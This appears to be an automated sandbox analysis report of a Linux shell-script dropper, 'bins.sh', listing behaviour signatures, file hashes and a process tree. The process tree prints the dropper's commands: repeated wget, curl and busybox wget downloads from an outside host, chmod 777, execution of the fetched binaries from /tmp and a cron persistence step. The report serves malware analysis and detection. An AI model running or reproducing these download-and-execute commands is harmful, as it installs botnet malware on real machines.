Analysis

  • max time kernel
    123s
  • max time network
    153s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240418-en
  • resource tags

    arch:mipselimage:debian9-mipsel-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
  • submitted
    09-11-2024 20:07

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    b1a4477e9c3d0e98d5145272953d06b5

  • SHA1

    338d214d12eae1ac6ff530e04df6cb6b8497e4a8

  • SHA256

    5bedea2089028be9979c0e2d54403f6440b59cbc64c081aea23c710666fac622

  • SHA512

    316bb7d17076445d00b5540a1fb0f7938cf08900b7336028a537afd73068cddc86604fd4437ef96868e3821a01a7ef5d5b08431ce58f3904c3d5b8916fc25597

  • SSDEEP

    192:q72+4zDnqRh1zM03C+iq2fOo4Erm2maM03C+eDnqRhjl4Erm2YiH2+h:5+zM03C+iqVo4Erm2maM03C+F4Erm2d

Malware Config

Signatures

  • Contacts a large (1705) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • File and Directory Permissions Modification 1 TTPs 4 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 2 IoCs
  • Renames itself 1 IoCs
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 15 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 3 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:712
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:716
        • /usr/bin/wget
          wget http://conn.masjesu.zip/bins/tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:720
        • /usr/bin/curl
          curl -O http://conn.masjesu.zip/bins/tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:740
        • /bin/busybox
          /bin/busybox wget http://conn.masjesu.zip/bins/tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq
          2⤵
          • System Network Configuration Discovery
          PID:743
        • /bin/chmod
          chmod 777 tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq
          2⤵
          • File and Directory Permissions Modification
          PID:744
        • /tmp/tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq
          ./tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq
          2⤵
          • Executes dropped EXE
          • System Network Configuration Discovery
          PID:745
        • /bin/rm
          rm tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq
          2⤵
          • System Network Configuration Discovery
          PID:747
        • /usr/bin/wget
          wget http://conn.masjesu.zip/bins/EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ
          2⤵
          • System Network Configuration Discovery
          PID:748
        • /usr/bin/curl
          curl -O http://conn.masjesu.zip/bins/EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:749
        • /bin/busybox
          /bin/busybox wget http://conn.masjesu.zip/bins/EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ
          2⤵
          • System Network Configuration Discovery
          PID:796
        • /bin/chmod
          chmod 777 EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ
          2⤵
          • File and Directory Permissions Modification
          PID:797
        • /tmp/EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ
          ./EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ
          2⤵
          • Executes dropped EXE
          • Renames itself
          • Reads runtime system information
          PID:798
          • /bin/sh
            sh -c "crontab -l"
            3⤵
              PID:800
              • /usr/bin/crontab
                crontab -l
                4⤵
                  PID:801
              • /bin/sh
                sh -c "crontab -"
                3⤵
                  PID:802
                  • /usr/bin/crontab
                    crontab -
                    4⤵
                    • Creates/modifies Cron job
                    PID:803
              • /bin/rm
                rm EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ
                2⤵
                  PID:806
                • /usr/bin/wget
                  wget http://conn.masjesu.zip/bins/waMUu3wStjbh57023DqN3DVIdOczWDiUhI
                  2⤵
                  • System Network Configuration Discovery
                  PID:890
                • /usr/bin/curl
                  curl -O http://conn.masjesu.zip/bins/waMUu3wStjbh57023DqN3DVIdOczWDiUhI
                  2⤵
                  • System Network Configuration Discovery
                  PID:900
                • /bin/busybox
                  /bin/busybox wget http://conn.masjesu.zip/bins/waMUu3wStjbh57023DqN3DVIdOczWDiUhI
                  2⤵
                  • System Network Configuration Discovery
                  PID:902
                • /bin/chmod
                  chmod 777 waMUu3wStjbh57023DqN3DVIdOczWDiUhI
                  2⤵
                  • File and Directory Permissions Modification
                  PID:905
                • /tmp/waMUu3wStjbh57023DqN3DVIdOczWDiUhI
                  ./waMUu3wStjbh57023DqN3DVIdOczWDiUhI
                  2⤵
                    PID:907
                  • /bin/rm
                    rm waMUu3wStjbh57023DqN3DVIdOczWDiUhI
                    2⤵
                      PID:909
                    • /usr/bin/wget
                      wget http://conn.masjesu.zip/bins/nSXEILSQAIDCSvgcEADEDzJquyDxtaHEp4
                      2⤵
                      • System Network Configuration Discovery
                      PID:911
                    • /usr/bin/curl
                      curl -O http://conn.masjesu.zip/bins/nSXEILSQAIDCSvgcEADEDzJquyDxtaHEp4
                      2⤵
                      • System Network Configuration Discovery
                      PID:913
                    • /bin/busybox
                      /bin/busybox wget http://conn.masjesu.zip/bins/nSXEILSQAIDCSvgcEADEDzJquyDxtaHEp4
                      2⤵
                      • System Network Configuration Discovery
                      PID:915
                    • /bin/chmod
                      chmod 777 nSXEILSQAIDCSvgcEADEDzJquyDxtaHEp4
                      2⤵
                      • File and Directory Permissions Modification
                      PID:917
                    • /tmp/nSXEILSQAIDCSvgcEADEDzJquyDxtaHEp4
                      ./nSXEILSQAIDCSvgcEADEDzJquyDxtaHEp4
                      2⤵
                        PID:918
                      • /bin/rm
                        rm nSXEILSQAIDCSvgcEADEDzJquyDxtaHEp4
                        2⤵
                          PID:920
                        • /usr/bin/wget
                          wget http://conn.masjesu.zip/bins/uon8OvrrB9Frxi0geNjzNpkUWmPk8Pw5uP
                          2⤵
                          • System Network Configuration Discovery
                          PID:922

                      Network

                      MITRE ATT&CK Enterprise v15

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • /tmp/EhFzW7S3hDE3I1ZriWxe8dTM59Q1e0vnwZ

                        Filesize

                        151KB

                        MD5

                        6c583043d91c55aa470c08c87058e917

                        SHA1

                        abf65a5b9bba69980278ad09356e53de8bb89439

                        SHA256

                        2d63c81a782853efe672a1d9cb00a339ec57207b4075754a1baf1df9af466948

                        SHA512

                        82ee5f3884edc2cb3e68d8634353964cdb991e250b0592a2f80f5ffb738e64860abe6d030aec0d6ab94596c275b478080579fd65b055cc9055e1ef3de6dd59a5

                      • /tmp/tipd5aLyyzlCilPXJXJMqUIWBz7SJGagtq

                        Filesize

                        112KB

                        MD5

                        05d7857dcead18bbd86d2935f591873c

                        SHA1

                        34d18f41ef35f93d5364ce3e24d74730a4e91985

                        SHA256

                        2cb1fa4742268fb0196613aee7a39a08a0707b3ef8853280d5060c44f3650d70

                        SHA512

                        d1793861067758a064ac1d59c80c78f9cb4b64dd680ab4a62dd050156dc0318dde590c7b44c1184c9ee926f73c3fc242662e42645faab6685ecef9d238d2e53e

                      • /var/spool/cron/crontabs/tmp.iuKPqZ

                        Filesize

                        210B

                        MD5

                        0b8fdb3b7750325facdafc1a8e8ea6b1

                        SHA1

                        58302cc52313b8e6f2ad9dcc8c744e744eb850dc

                        SHA256

                        89942faacb2ac492486e35aac40337031e9ba1f7a38013002ea1896adc5e01db

                        SHA512

                        5e0f4f6ee06b0d451ac2ca51863a9d791f41a355f7223a9f65185e228862d9a60d45e9a9a411aa57f6b4ce0ae11728013aa9eaad0d0c6d9502d06684bfa5e8fb